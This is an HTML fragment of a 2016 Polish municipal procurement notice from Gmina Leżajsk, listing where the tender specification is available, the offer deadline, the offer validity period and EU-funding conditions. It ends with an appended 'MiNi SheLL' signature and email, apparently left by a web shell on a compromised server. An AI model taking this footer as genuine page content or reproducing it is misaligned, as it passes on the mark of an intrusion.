    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminalezajsk.pl (BIP)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Leżajsku ul. Opalińskiego 2, 37-300 Leżajsk (pok. 42).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2016 godzina 10:00, miejsce: Urząd Gminy w Leżajsku ul. Opalińskiego 2,                                37-300 Leżajsk (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com